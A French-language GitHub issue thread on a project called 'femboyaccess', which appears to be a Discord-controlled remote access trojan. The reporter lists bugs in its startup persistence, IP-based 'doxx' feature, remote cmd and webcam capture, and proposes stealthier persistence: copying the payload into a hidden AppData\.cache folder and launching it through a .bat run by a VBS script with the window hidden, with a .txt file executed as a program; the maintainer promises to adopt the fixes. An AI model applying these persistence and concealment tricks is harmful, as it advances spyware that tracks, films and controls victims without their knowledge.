### ISSUE TITLE
retour

### ISSUE THREAD

**Issue by StuKit** [ambr0sial/femboyaccess#3]
hello, je viens de try la plupart du projet donc voici les points où un problème suggère 😄 :

Startup | j'arrive pas a savoir si le problème viens de moi, mais le fichier .bat contient pas le femboyaccess, dans mon cas : start '" "C:\Users\user\Desktop\fmbo"'

Suggestion : peut être copy le femboyaccess a un dossier custom via le package shutil, l'open via un .bat qui est lui mème open par un vbs pour pas qu'un cmd s'affiche
(contenu bat : 'call C:\Users\user\AppData\Roaming\\.cache\data.txt', contenu vbs : Set 'WshShell = CreateObject("WScript.Shell") 
WshShell.Run chr(34) & "C:\Users\user\AppData\Roaming\.cache\run.bat" & Chr(34), 0
Set WshShell = Nothing')
le .txt est executer comme un executable
![image](https://github.com/ambr0sial/femboyaccess/assets/75397288/1588c3e8-9141-4a98-acb4-e4a7c2d27999)

doxx ou le message du on_ready | je pense c'est juste moi mais ca envoie aucun donné, j'ai modifier https://ipapi.co/json/ par https://ipinfo.io/json/ :I (Update : je viens de voir que ipapi a une sorte d'anti ddos qui prends quelques secondes avant de te rediriger vers le site)

cmd | il est dans le screen du screenshot mais aucune trace dans le src, peut être un oublie

webcampic | fonction non défini "CAP_DSHOW"

et c tout pour moi :D (j'ai pas experimenté avec ceux qui peuvent être chiants a enlever)

**Comment by ambr0sial** [comment]
mercii beaucoup!! j'arrangerais tout ça dans la prochaine update
